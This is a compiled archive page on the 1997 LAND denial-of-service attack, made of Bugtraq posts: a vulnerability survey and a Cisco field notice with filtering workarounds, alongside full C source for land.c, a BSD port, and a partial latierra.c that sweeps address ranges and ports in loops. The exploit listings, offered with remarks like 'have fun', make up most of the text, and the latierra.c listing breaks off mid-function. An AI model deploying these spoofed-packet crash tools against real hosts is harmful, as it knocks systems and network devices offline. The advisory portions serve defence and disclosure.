The LAND attack (IP DOS)

Summary
Description:Sending a packet to a machine with the source host/port the same as the destination host/port crashes a lot of boxes.
Author:m3lt <meltman@LAGGED.NET>
Compromise:Remote DOS attack (reboots many systems)
Vulnerable Systems:Windows95, Windows NT 4.0, WfWG 3.11, FreeBSD
Date:20 November 1997
Details


Date: Thu, 20 Nov 1997 19:40:19 -0500
From: m3lt <meltman@LAGGED.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: new TCP/IP bug in win95

hi,

        i recently discovered a bug which freezes win95 boxes.  here's how
it works: send a spoofed packet with the SYN flag set from a host, on an open
port (such as 113 or 139), setting as source the SAME host and port
(ie: 10.0.0.1:139 to 10.0.0.1:139).  this will cause the win95 machine to lock
up.

        the piece of code included in this message does that, so...  have fun!

        i haven't tested this bug on other platforms, i don't have the
ressources.  please feel free to do so.

m3lt
meltman@lagged.net

--- snip snip -----------------------------------------------------------

/* land.c by m3lt, FLC
   crashes a win95 box */

#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>

struct pseudohdr
{
        struct in_addr saddr;
        struct in_addr daddr;
        u_char zero;
        u_char protocol;
        u_short length;
        struct tcphdr tcpheader;
};

u_short checksum(u_short * data,u_short length)
{
        register long value;
        u_short i;

        for(i=0;i<(length>>1);i++)
                value+=data[i];

        if((length&1)==1)
                value+=(data[i]<<8);

        value=(value&65535)+(value>>16);

        return(~value);
}

int main(int argc,char * * argv)
{
        struct sockaddr_in sin;
        struct hostent * hoste;
        int sock;
        char buffer[40];
        struct iphdr * ipheader=(struct iphdr *) buffer;
        struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
        struct pseudohdr pseudoheader;

        fprintf(stderr,"land.c by m3lt, FLC\n");

        if(argc<3)
        {
                fprintf(stderr,"usage: %s IP port\n",argv[0]);
                return(-1);
        }

        bzero(&sin,sizeof(struct sockaddr_in));
        sin.sin_family=AF_INET;

        if((hoste=gethostbyname(argv[1]))!=NULL)
                bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
        else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
        {
                fprintf(stderr,"unknown host %s\n",argv[1]);
                return(-1);
        }

        if((sin.sin_port=htons(atoi(argv[2])))==0)
        {
                fprintf(stderr,"unknown port %s\n",argv[2]);
                return(-1);
        }

        if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
        {
                fprintf(stderr,"couldn't allocate raw socket\n");
                return(-1);
        }

        bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
        ipheader->version=4;
        ipheader->ihl=sizeof(struct iphdr)/4;
        ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
        ipheader->id=htons(0xF1C);
        ipheader->ttl=255;
        ipheader->protocol=IP_TCP;
        ipheader->saddr=sin.sin_addr.s_addr;
        ipheader->daddr=sin.sin_addr.s_addr;

        tcpheader->th_sport=sin.sin_port;
        tcpheader->th_dport=sin.sin_port;
        tcpheader->th_seq=htonl(0xF1C);
        tcpheader->th_flags=TH_SYN;
        tcpheader->th_off=sizeof(struct tcphdr)/4;
        tcpheader->th_win=htons(2048);

        bzero(&pseudoheader,12+sizeof(struct tcphdr));
        pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.protocol=6;
        pseudoheader.length=htons(sizeof(struct tcphdr));
        bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
        tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

        if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
        {
                fprintf(stderr,"couldn't send packet\n");
                return(-1);
        }

        fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);

        close(sock);
        return(0);
}

--- snip snip -----------------------------------------------------------


Date: Mon, 24 Nov 1997 23:53:16 -0600
From: Aleph One 
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: "LAND" Attack Update

This is the last "LAND" update. I will not post any more. This list is not
meant to be comprehensive nor accurate. For an accurate assestment of the
risk to your IP stack contact your vendor.

Cisco Field Notice: TCP Loopback Denial-of-Service Attack and Cisco Devices
http://www.cisco.com/warp/public/770/land-pub.shtml

Read "Network Ingress Filtering: Defeating Denial of Service Address Spoofing"
ftp://ietf.org/internet-drafts/draft-ferguson-ingress-filtering-03.txt

The survey says:

AIX 3                                   IS  vulnerable
AIX 3.2                                 NOT vulnerable
AIX 4                                   NOT vulnerable
AIX 4.1                                 NOT vulnerable
AIX 4.2.1                               NOT vulnerable
AmigaOS AmiTCP 4.0demo                  NOT vulnerable
AmigaOS AmiTCP 4.2 (Kickstart 3.0)      IS  vulnerable
AmigaOS Miami 2.0                       NOT vulnerable
AmigaOS Miami 2.1f                      NOT vulnerable
AmigaOS Miami 2.1p                      NOT vulnerable
AmigaOS Miami 2.92c                     NOT vulnerable
BeOS Preview Release 2 PowerMac         IS  vulnerable
BSDI 2.0                                IS  vulnerable
BSDI 2.1 (vanilla)                      IS  vulnerable
BSDI 2.1 (K210-021,K210-022,K210-024)   NOT vulnerable
BSDI 3.0                                NOT vulnerable
DG/UX R4.12                             NOT vulnerable
Digital UNIX 3.2c                       NOT vulnerable
Digital UNIX 4.0                        NOT vulnerable
Digital VMS ???                         IS  vulnerable
FreeBSD 2.1.6-RELEASE                   NOT vulnerable
FreeBSD 2.2.2-RELEASE                   NOT vulnerable
FreeBSD 2.2.5-RELEASE                   IS  vulnerable
FreeBSD 2.2.5-STABLE                    IS  vulnerable (fixed)
FreeBSD 3.0-CURRENT                     IS  vulnerable (fixed)
HP External JetDirect Print Servers     IS  vulnerable
HP-UX 9.03                              NOT vulnerable
HP-UX 10.01                             NOT vulnerable
HP-UX 10.20                             NOT vulnerable
IBM AS/400 OS7400 3.7                   IS  vulnerable (100% CPU)
IRIX 5.2                                IS  vulnerable
IRIX 5.3                                IS  vulnerable
IRIX 6.2                                NOT vulnerable
IRIX 6.3                                NOT vulnerable
IRIX 6.4                                NOT vulnerable
Linux 1.2.13                            NOT vulnerable
Linux 2.1.65                            NOT vulnerable
Linux 2.0.30                            NOT vulnerable
Linux 2.0.32                            NOT vulnerable
MacOS MacTCP                            IS  vulnerable
MacOS OpenTransport 1.1.1               NOT vulnerable
MacOS 7.1p6                             NOT vulnerable
MacOS 7.5.1                             NOT vulnerable
MacOS 7.6.1 OpenTransport 1.1.2         IS  vulnerable (not a compleate lockup)
MacOS 8.0                               IS  vulnerable (TCP/IP stack crashed)
MVS OS390 1.3                           NOT vulnerable
NetApp NFS server 4.1d                  IS  vulnerable
NetApp NFS server 4.3                   IS  vulnerable
NetBSD 1.1                              IS  vulnerable
NetBSD 1.2                              IS  vulnerable
NetBSD 1.2a                             IS  vulnerable
NetBSD 1.2.1                            IS  vulnerable (fixed)
NetBSD 1.3_ALPHA                        IS  vulnerable (fixed)
NeXTSTEP 3.0                            IS  vulnerable
NeXTSTEp 3.1                            IS  vulnerable
Novell 4.11                             IS  vulnerable (100% CPU for 30 secs)
OpenBSD 2.1                             (conflicting reports)
OpenBSD 2.2                             NOT vulnerable
OpenVMS 7.1 with UCX 4.1-7              IS  vulnerable
OS/2 3.0                                NOT vulnerable
OS/2 4.0                                NOT vulnerable
QNX 4.24                                IS  vulnerable
Rhapsody Developer Release              IS  vulnerable
SCO OpenServer 5.0.2 SMP                IS  vulnerable
SCO OpenServer 5.0.4                    IS  vulnerable (kills networking)
SCO Unixware 2.1.1                      IS  vulnerable
SCO Unixware 2.1.2                      IS  vulnerable
Salaris 2.4                             NOT vulnerable
Solaris 2.5.1                           NOT vulnerable
Solaris 2.5.2                           NOT vulnerable
Solaris 2.6                             NOT vulnerable
SunOS 4.1.3                             IS  vulnerable
SunOS 4.1.4                             IS  vulnerable
Ultrix ???                              NOT vulnerable
Windows 95 (vanilla)                    IS  vulnerable
Windows 95 + Winsock 2 + VIPUPD.EXE     IS  vulnerable
Windows NT (vanilla)                    IS  vulnerable
Windows NT + SP3                        IS  vulnerable
Windows NT + SP3 + simptcp-fix          IS  vulnerable

Some misc stuff:

3Com Accessbuilder 600/700              NOT vulnerable
3Com LinkSwitch 1000                    NOT vulnerable
3Com OfficeConnect 500                  NOT vulnerable
3Com SuperStack II Switch 1000          IS  vulnerable
Adtran TSU Rack                         NOT vulnerable
Apple LaserWriter                       IS  vulnerable
Ascend 4000 5.0Ap20                     NOT vulnerable
Ascend Pipeline 50 rev 5.0Ai16          NOT vulnerable
Ascend Pipeline 50 rev 5.0Ap13          NOT vulnerable
BayNetworks MARLIN 1000 OS (0).3.024(R) NOT vulnerable
BinTec BIANCA/BRICK-XS 4.6.1 router     IS  vulnerable
Cisco Classic IOS < 10.3, early 10.3, 11.0, 11.1, and 11.2 IS vulnerable
Cisco IOS/700                           IS  vulnerable
Cisco Catalyst                          IS  vulnerable
Digital VT1200                          IS  vulnerable
Farallon Netopia PN440                  NOT vulnerable
HP Envizex Terminal                     IS  vulnerable
LaserJet Printer                        NOT vulnerable
Livingston Office Router (ISDN)         IS  vulnerable
Livingston PM ComOS 3.3.3               NOT vulnerable
Livingston PM ComOS 3.5b17 + 3.7.2      NOT vulnerable
Livingston PM ComOS 3.7L                NOT vulnerable
Livingston PM ComOS 3.7.2               NOT vulnerable
Livingston Enterprise PM 3.4 2L         NOT vulnerable
Livingston T1/E1 OR                     IS  vulnerable
Milkyway Blackhole Firewall 3.0 (SunOS) IS  vulnerable
Milkyway Blackhole Firewall 3.02(SunOS) IS  vulnerable
NCD X Terminals, NCDWare v3.1.0         IS  vulnerable
NCD X Terminals, NCDWare v3.2.1         IS  vulnerable
Netopia PN440 v2.0.1                    IS  vulnerable
Proteon GT60                            NOT vulnerable
Proteon GT60Secure                      NOT vulnerable
Proteon GT70                            NOT vulnerable
Proteon GT70Secure                      NOT vulnerable
Proteon GTAM                            NOT vulnerable
Proteon GTX250                          NOT vulnerable
Proteon RBX250                          NOT vulnerable
Sonix Arpeggio                          NOT vulnerable
Sonix Arpeggio +                        NOT vulnerable
Sonix Arpeggio Lite                     NOT vulnerable

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01



Date: Fri, 21 Nov 1997 10:58:39 -0800
From: blast 
To: BUGTRAQ@NETSPACE.ORG
Subject: 44BSD port of land.c

For those of you who don't have all the "fancy" LINUX
networking includes, here is a port to 44BSD flavors.
Should compile fine on FreeBSD, NetBSD, OpenBSD, BSDi, etc.
Enjoy.
-blast
   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
   \    Tim Keanini    |         "The limits of my language,            /
   /                   |         are the limits of my world."           \
   \ blast@broder.com  |         --Ludwig Wittgenstein                  /
   \                   +================================================/
   |Key fingerprint =  7B 68 88 41 A8 74 AB EC  F0 37 98 4C 37 F7 40 D6 |
   /    PUB KEY: http://www-swiss.ai.mit.edu/~bal/pks-commands.html     \
   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


/* land.c by m3lt, FLC
   crashes a win95 box
   Ported by blast and jerm to 44BSD*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 


/* #include  */
/* #include  */

struct pseudohdr
{
        struct in_addr saddr;
        struct in_addr daddr;
        u_char zero;
        u_char protocol;
        u_short length;
        struct tcphdr tcpheader;
};

u_short checksum(u_short * data,u_short length)
{
        register long value;
        u_short i;

        for(i=0;i<(length>>1);i++)
                value+=data[i];

        if((length&1)==1)
                value+=(data[i]<<8);

        value=(value&65535)+(value>>16);

        return(~value);
}

int main(int argc,char * * argv)
{
        struct sockaddr_in sin;
        struct hostent * hoste;
        int sock,foo;
        char buffer[40];
        struct ip * ipheader=(struct ip *) buffer;
        struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip));
        struct pseudohdr pseudoheader;

        fprintf(stderr,"land.c by m3lt mod by blast, FLC\n");

        if(argc<3)
        {
                fprintf(stderr,"usage: %s IP port\n",argv[0]);
                return(-1);
        }

        bzero(&sin,sizeof(struct sockaddr_in));
        sin.sin_family=AF_INET;

        if((hoste=gethostbyname(argv[1]))!=NULL)
                bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
        else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
        {
                fprintf(stderr,"unknown host %s\n",argv[1]);
                return(-1);
        }

        if((sin.sin_port=htons(atoi(argv[2])))==0)
        {
                fprintf(stderr,"unknown port %s\n",argv[2]);
                return(-1);
        }

        if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
        {
                fprintf(stderr,"couldn't allocate raw socket\n");
                return(-1);
        }

        foo=1;
        if(setsockopt(sock,0,IP_HDRINCL,&foo,sizeof(int))==-1)
        {
                fprintf(stderr,"couldn't set raw header on socket\n");
                return(-1);
        }

        bzero(&buffer,sizeof(struct ip)+sizeof(struct tcphdr));
        ipheader->ip_v=4;
        ipheader->ip_hl=sizeof(struct ip)/4;
        ipheader->ip_len=sizeof(struct ip)+sizeof(struct tcphdr);
        ipheader->ip_id=htons(0xF1C);
        ipheader->ip_ttl=255;
        ipheader->ip_p=IPPROTO_TCP;
        ipheader->ip_src=sin.sin_addr;
        ipheader->ip_dst=sin.sin_addr;

        tcpheader->th_sport=sin.sin_port;
        tcpheader->th_dport=sin.sin_port;
        tcpheader->th_seq=htonl(0xF1C);
        tcpheader->th_flags=TH_SYN;
        tcpheader->th_off=sizeof(struct tcphdr)/4;
        tcpheader->th_win=htons(2048);

        bzero(&pseudoheader,12+sizeof(struct tcphdr));
        pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.protocol=6;
        pseudoheader.length=htons(sizeof(struct tcphdr));
        bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
        tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

        if(sendto(sock,buffer,sizeof(struct ip)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
        {
                fprintf(stderr,"couldn't send packet,%d\n",errno);
                return(-1);
        }

        fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]);

        close(sock);
        return(0);
}




Date: Fri, 21 Nov 1997 14:38:14 -0800
From: John Bashinski 
To: BUGTRAQ@NETSPACE.ORG
Subject: Field Notice: TCP loopback DoS Attack (land.c) and Cisco Devices

-----BEGIN PGP SIGNED MESSAGE-----

Field Notice:
TCP loopback DoS Attack (land.c) and Cisco Devices

November 21, 1997, 14:00 AM US/Pacific, Revision 1
- --------------------------------------------------

Summary
- -----
Somebody has released a program, known as land.c, which  can be used to
launch denial of service attacks against various TCP implementations. The
program sends a TCP SYN packet (a connection initiation), giving the target
host's address as both source and destination, and using the same port on
the target host as both source and destination.

Classic IOS software (used on Cisco routers with product numbers greater
than 1000, on the CGS/MGS/AGS+,  and on the CS-500) is moderately vulnerable
to this attack.  For some IOS versions, if the attack is launched against a
TCP port that is actually listening (say the TELNET port), then invalid
connection data will be created, preventing further legitimate connections
for approximately 30 seconds. High CPU loads may result on some IOS
versions. We observed a complete hang on one 11.5 system, but have been
unable to reproduce that failure. Based on very preliminary data, the
router's packet forwarding functions are not generally affected.

IOS/700 (used on Cisco 7xx routers) is also vulnerable. The  7xx
vulnerability is more devastating than the classic IOS vulnerability, but
probably less dangerous for most customers, since firewalls separate most
7xx routers from the Internet.

The PIX firewall appears does not appear to be affected. Initial testing of
the Centri firewall tends to indicate that it is not affected.

We're working on characterizing other products' vulnerability to attack.
Updates will be issued as information becomes available.

Who is Affected
- -------------
All IOS and IOS/700 systems that can be reached via TCP from untrusted hosts
are affected, provided that the reachable TCP ports are ports on which IOS
ordinarily provides service. The attack requires spoofing the targets's own
address, so systems behind effective anti-spoofing firewalls are safe.

Impact
- ----
Classic IOS systems may experience slowdowns while under active attack. On
IOS software versions earlier than 11.2(4), new TCP connections will fail
for a period of about 30 seconds after any attack packet is received. IOS
versions later than 11.2(4), or that contain the fix for bug ID CSCdi87533,
may experience slowdowns, but should continue to accept new TCP connections
. Most IOS versions appear to recover completely within a few minutes of the
attack stopping, but we have not yet fully characterized the effect on all
IOS versions. One complete failure was observed; the version was 11.1(5).  A
configuration workaround for classic IOS can prevent the problem entirely,
subject to performance restrictions.

IOS/700 systems subjected to the attack will hang indefinitely and must be
physically reset.  A configuration workaround for IOS/700 can prevent the
problem entirely.

Initial tests indicate that the PIX firewall is not vulnerable to this
attack. Tests have been conducted with version 4.1.3.245 and 4.0.7.

Initial tests indicate that the Centri  firewall  (build 4.110) is not
vulnerable to this attack with no exposed service configured. We have not
yet tested the Centri product with exposed services.

Workaround for Classic IOS
- ------------------------
Classic IOS users can use input access lists on their interfaces to prevent
the attack packets from entering their TCP stacks. This will prevent the
attack entirely, but may have unacceptable performance impacts on heavily
loaded high-end routers. Traffic will still be fast-switched, but
higher-speed switching modes may be disabled. It should be tried with care.

If you have no existing input access lists, create a new IP extended access
list. Use a presently-unused number between 100 and 199. The access list
must have an entry for each of  the IP address configured on the system.
Deny packets from each address to itself.  For example:

    access-list 101 deny tcp 1.2.3.4 0.0.0.0 1.2.3.4 0.0.0.0
    access-list 101 deny tcp 5.6.7.8 0.0.0.0 5.6.7.8 0.0.0.0
    access-list 101 permit ip 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255

If you have existing access lists, you'll need to merge the new entries in
an appropriate way, generally at the top of the list. The access list should
be applied incoming on all interfaces, so a fragment of a total router
configuration might look like this:

    interface ethernet 0
    ip address 1.2.3.4 255.255.255.0
    ip access-group 101 in
    !
    interface ethernet 1
    ip address 5.6.7.8
    ip access-group 101 in
    !
    access-list 101 deny tcp 1.2.3.4 0.0.0.0 1.2.3.4 0.0.0.0
    access-list 101 deny tcp 5.6.7.8 0.0.0.0 5.6.7.8 0.0.0.0
    access-list 101 permit ip 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255

Workaround for IOS/700
- --------------------
Add the following configuration command to any profile that may be active
when connected to potentially hostile network:

set ip filter tcp in source <7xx IP address> destination <7xx IP address> block

Using Cisco Products to Protect Other Systems
- -------------------------------------------
We do not believe that this attack can be used against systems behind our
dedicated firewall products, the PIX and Centri firewalls, unless
general-purpose tunnels have been enabled through the firewalls.

Properly designed anti-spoofing access lists at border routers can be used
to prevent the attack from entering a private network from the Internet. Use
the access lists to filter out packets whose IP source addresses are on your
internal net, but which are arriving from interfaces connected to the
outside Internet.

Exploitation and Public Announcements
- -----------------------------------
Cisco has had multiple reports of this vulnerability.

Most exploitation seems to be using the original program, which sends one
packet at a time. Floods of invalid packets have not been reported.

This issue has been widely discussed in a variety of Internet fora.

Cisco first heard of this problem on the morning of Friday, November 21.

Distribution of this Notice
- -------------------------
This notice is being sent to the following Internet mailing lists and
newsgroups:

   * cisco@spot.colorado.edu
   * comp.dcom.sys.cisco
   * bugtraq@netspace.org
   * first-teams@first.org (includes CERT/CC)
   * nanog@merit.edu

Updates will be sent to some or all of these, as appropriate.

This notice will be posted in the "Field Notices" section of Cisco's
Worldwide Web site, which can be found under "Technical Tips" in the
"Service and Support" section. The URL will be

     http://www.cisco.com/warp/public/770/land-pub.shtml

The copy on the Worldwide Web will be updated as appropriate.

Cisco Security Procedures
- -----------------------
Please report security issues with Cisco products to
security-alert@cisco.com.

This notice is copyright 1997 by Cisco Systems, Inc. This notice may be
redistributed freely provided that redistributed copies are complete and
unmodified, including all date and version information.




-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNHYMogyPsuGbHvEpAQHojQgAtU3nEwtn+2Xg8W8jLTcCIiF+q0oFhmMS
Z54T67xooTmsWbLzv409AYR73G/TbsNgflzQZa8amAXbz6EIUlzaYqJdHB2B7FsH
GFh8c7VFZZ7zp9r9UVJJYjSYwRENLpDaKb5kx//zOFF/9eh4G95cJ6zMMLukSreJ
MAA+5xc23SV+fpk+AmxEzWifAYoIz9KRsK0/GTHA93F17MZEvTIauVf3VxD8DSHV
zA7ndUNuxH0rg2oGOok4XbiBSSXK3glkkCAkJ0OzGEPt7RZ1EcJ+TpTJpETu+F7z
0XyJXF25TxoMAu8MmmM4IQvRtZzM0PGCA6X3XErg6wiUFJL1JFpejQ==
=SkPH
-----END PGP SIGNATURE-----


Date: Wed, 26 Nov 1997 09:29:04 -0800
From: "Kelly E. Gibbs" 
To: BUGTRAQ@NETSPACE.ORG
Subject: Dos against NT4-SP3 and 95 [latierra.c]

Found this on www.rootshell.com, seems to work all too well
against NT4-SP3, and crashes 95.

/**************************************************************/
/*                                                            */
/*  La Tierra v1.0b  - by MondoMan (KeG), elmondo@usa.net     */
/*                                                            */
/*  Modified version of land.c by m3lt, FLC                   */
/*                                                            */
/*  Compiled on RedHat Linux 2.0.27, Intel Pentium 200Mhz     */
/*  gcc version 2.7.2.1       tabs set to 3                   */
/*                                                            */
/*  gcc latierra.c -o latierra                                */
/*                                                            */
/*  Refer to readme.txt for more details and history          */
/*                                                            */
/**************************************************************/
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define DEFAULT_FREQUENCY  1
#define TRUE       1
#define FALSE        0
#define FOR_EVER      -5
#define LIST_FILE      1
#define ZONE_FILE      2
#define MAXLINELENGTH    512
#define DEFAULT_SEQ    0xF1C
#define DEFAULT_TTL           0xFF
#define DEFAULT_TCPFLAGS      (TH_SYN | TH_PUSH)
#define DEFAULT_WINSIZE       0xFDE8
struct pseudohdr
 {
   struct in_addr saddr;
   struct in_addr daddr;
   u_char zero;
   u_char protocol;
   u_short length;
   struct tcphdr tcpheader;
 };
typedef struct latierra_data
 {
 char dest_ip[256];
 int  tcp_flags;
 int  window_size;
 int  ip_protocol;
 int  sequence_number;
 int  ttl;
 int  supress_output;
        int  message_type;
 } LATIERRA_DATA;
void alternatives(void);
int  get_ip(int use_file, FILE *fp, char *buff);
int  land(LATIERRA_DATA *ld, int port_number);
void nslookup_help(void);
void print_arguments(void);
void protocol_list(void);
/********/
/* main */
/********/
int main(int argc, char **argv)
{
 FILE *fp;
 LATIERRA_DATA ld;
 int frequency = DEFAULT_FREQUENCY, x;
 int beginning_port=1, octet=1, scan_loop=0, loop_val=0, use_file=FALSE;
 int ending_port = 0, loop = TRUE, i = 0, increment_addr = FALSE;
   char got_ip = FALSE, got_beg_port = FALSE;
 char class_c_addr[21], filename[256], buff[512], valid_tcp_flags[16];
 printf("\nlatierra v1.0b by MondoMan (elmondo@usa.net), KeG\n");
   printf("Enhanced version of land.c originally developed by m3lt, FLC\n");
 strcpy(valid_tcp_flags, "fsrpau");
 ld.tcp_flags = 0;
 ld.window_size = DEFAULT_WINSIZE;
 ld.ip_protocol = IP_TCP;
 ld.sequence_number = DEFAULT_SEQ;
 ld.ttl = DEFAULT_TTL;
 ld.message_type = 0;

 if(argc > 1 && (!strcmp(argv[1], "-a")))
  alternatives();
 if(argc > 1 && (!strcmp(argv[1], "-n")))
  nslookup_help();
 if(argc > 1 && (!strcmp(argv[1], "-p")))
  protocol_list();
 if(argc == 1 || ( (argc >= 2) && (!strcmp(argv[1], "-h"))))
  print_arguments();
 while((i = getopt(argc, argv, "i:b:e:s:l:o:t:w:p:q:v:m:")) != EOF)
  {
  switch(i)
   {
   case 't':
    for(x=0;x 1)
     strcpy(ld.dest_ip, optarg);
    else
     {
     printf("ERROR: Must specify valid IP or hostname.\n");
     return(-6);
     }
    got_ip = TRUE;
    break;
   case 's':
    frequency = atoi(optarg);
    break;
   case 'l':
    loop = atoi(optarg);
    break;
   case 'b':
    beginning_port = atoi(optarg);
    got_beg_port = TRUE;
    break;
   case 'e':
    ending_port = atoi(optarg);
    break;
   }
  }
 if(!ld.tcp_flags)
  ld.tcp_flags = DEFAULT_TCPFLAGS;
 if(!got_beg_port)
  {
  fprintf(stderr, "\nMust specify beginning port number.  Use -h for help with arguments.\n\n");
  return(-7);
  }
 if(ending_port == 0)
  ending_port = beginning_port;
 printf("\nSettings:\n\n");
   printf("  (-i)   Dest. IP Addr   : ");
 if(ld.dest_ip[strlen(ld.dest_ip) -1] == '-')
  {
  ld.dest_ip[strlen(ld.dest_ip)-1] = 0x0;
  strcpy(class_c_addr, ld.dest_ip);
  strcat(ld.dest_ip, "1");
  printf(" %s (Class C range specified).\n", ld.dest_ip);
  increment_addr = TRUE;
  octet = 1;
  }
 else
  if(strlen(ld.dest_ip) > 5)
   {
   if(strncmp(ld.dest_ip, "zone=", 5)==0)
    {
    strcpy(filename, &ld.dest_ip[5]);
    printf("%s (using DNS zone file)\n", filename);
    use_file = ZONE_FILE;
    }
   else if(strncmp(ld.dest_ip, "list=", 5) == 0)
    {
    strcpy(filename, &ld.dest_ip[5]);
    printf("%s (using ASCII list)\n", filename);
    use_file = LIST_FILE;
    }
   else
    printf("%s\n", ld.dest_ip);
   }
  else
   {
   printf("Destination specifier (%s) length must be > 7.\n", ld.dest_ip);
   return(-9);
   }
 printf("  (-b)   Beginning Port #: %d\n",     beginning_port );
 printf("  (-e)   Ending Port #   : %d\n",     ending_port );
 printf("  (-s)   Seconds to Pause: %d\n",     frequency );
 printf("  (-l)   Loop            : %d %s\n",  loop, (loop == FOR_EVER) ? "(forever)" : " " );
 printf("  (-w)   Window size     : %d\n",     ld.window_size );
 printf("  (-q)   Sequence Number : %X (%d)\n",ld.sequence_number, ld.sequence_number );
 printf("  (-v)   Time-to-Live    : %d\n",     ld.ttl);
 printf("  (-p)   IP Protocol #   : %d\n",     ld.ip_protocol );
 printf("  (-t)   TCP flags       : ");
 strcpy(buff, "");
 if( ld.tcp_flags & TH_FIN)
  strcat(buff, "fin ");
 if( ld.tcp_flags & TH_SYN)
  strcat(buff, "syn ");
 if(ld.tcp_flags & TH_RST)
  strcat(buff, "rst ");
 if(ld.tcp_flags & TH_PUSH)
  strcat(buff, "push ");
 if(ld.tcp_flags & TH_ACK)
  strcat(buff, "ack ");
 if(ld.tcp_flags & TH_URG)
  strcat(buff, "urg ");
 printf("%s\n\n", buff);

 if(ending_port < beginning_port)
  {
  printf("\nERROR: Ending port # must be greater than beginning port #\n\n");
  return(-8);
  }

 scan_loop = loop_val = loop;

 if(use_file)
  {
  if(access(filename, 0))
   {
   printf("\nERROR: The file you specified (%s) cannot be found.\n\n", filename);
   return(-9);
   }
  if( (fp = fopen(filename, "rt")) == NULL)
   {
   printf("ERROR: Unable to open %s.\n", filename);
   return(-10);
   }
  if(!get_ip(use_file, fp, buff))
   {
   printf("Unable to get any IP address from file %s.\n");
   return(-11);
   }
  strcpy(ld.dest_ip, buff);
  }

 while( (loop == FOR_EVER) ? 1 : loop-- > 0)
  {
  for(i=beginning_port; i <= ending_port; i++)
   {
   if(land(&ld, i))        /* go for it BaBy! */
    break;
     if(frequency)          /* make sure freq > 0 */
     {
    if(!ld.supress_output)
     printf("-> paused %d seconds.\n", frequency);
    sleep(frequency);
    }
   }
  if( (!use_file) && (loop && increment_addr) )
   {
   char temp_addr[21];
   if(++octet > 254)                        /* check for reset */
    {
    if(loop_val != FOR_EVER)              /* make sure not to distrute forever! */
     {
     if(++scan_loop > loop_val)        /* check if scanned x times */
      break;
     else
      loop = loop_val;                /* restore original value */
     }
    octet = 1;                           /* reset */
    }
   sprintf(temp_addr, "%s%d", class_c_addr, octet);
   strcpy(ld.dest_ip, temp_addr);

   if(!ld.supress_output)
    printf("** incrementing to next IP address: %s\n", ld.dest_ip);
   if(scan_loop > loop_val)
    break; /* break while loop */
   }
  else if(use_file)
   {
   if(!get_ip(use_file, fp, buff))
    break;

   loop++;
   strcpy(ld.dest_ip, buff);
   }
  } /* end while */
 printf("\nDone.\n\n");
} /* end main */
int  get_ip(int use_file, FILE *fp, char *buff)
{
 if(use_file == LIST_FILE)
  return(get_ip_from_list(fp, buff));

 return(get_ip_from_zone(fp, buff));
}
int get_ip_from_list(FILE *fp, char *buff)
{
 int ret_val;
 while(1)
  {
  ret_val = (int)fgets(buff, MAXLINELENGTH, fp);
  if((ret_val == EOF) || (ret_val == (int)NULL))
   return 0;
  if( strlen(buff) >= 7)
   if((buff[0] != ';') && (buff[0] != '['))
    {
    if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
     buff[strlen(buff)-1] = 0x0;
    return 1;
    }
  }
 return 0;
}
int get_ip_from_zone(FILE *fp, char *buff)
{
 int ret_val, i;
 char *p, delim[8];
 strcpy(delim, " \t");
 while(1)
  {
  ret_val = (int)fgets(buff, MAXLINELENGTH, fp);
  if((ret_val == EOF) || (ret_val == (int)NULL))
   return 0;
  if( strlen(buff) >= 7)
   if((buff[0] != ';') && (buff[0] != '[') && (strncmp(buff, "ls -d", 5) != 0))
    {
    if( (p = strtok( buff, delim)) == NULL)
     continue;
    if( (p = strtok(NULL, delim)) == NULL)
     continue;
    if(strcmp(p, "A"))   /* be sure second column is an DNS A record */
     continue;

    if( (p = strtok(NULL, delim)) == NULL)
     continue;
    strcpy(buff, p);
    /* verify that we have a valid IP address to work with */
    if(inet_addr(p) == -1)
     continue;
    /* strip off training line characters */

    if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
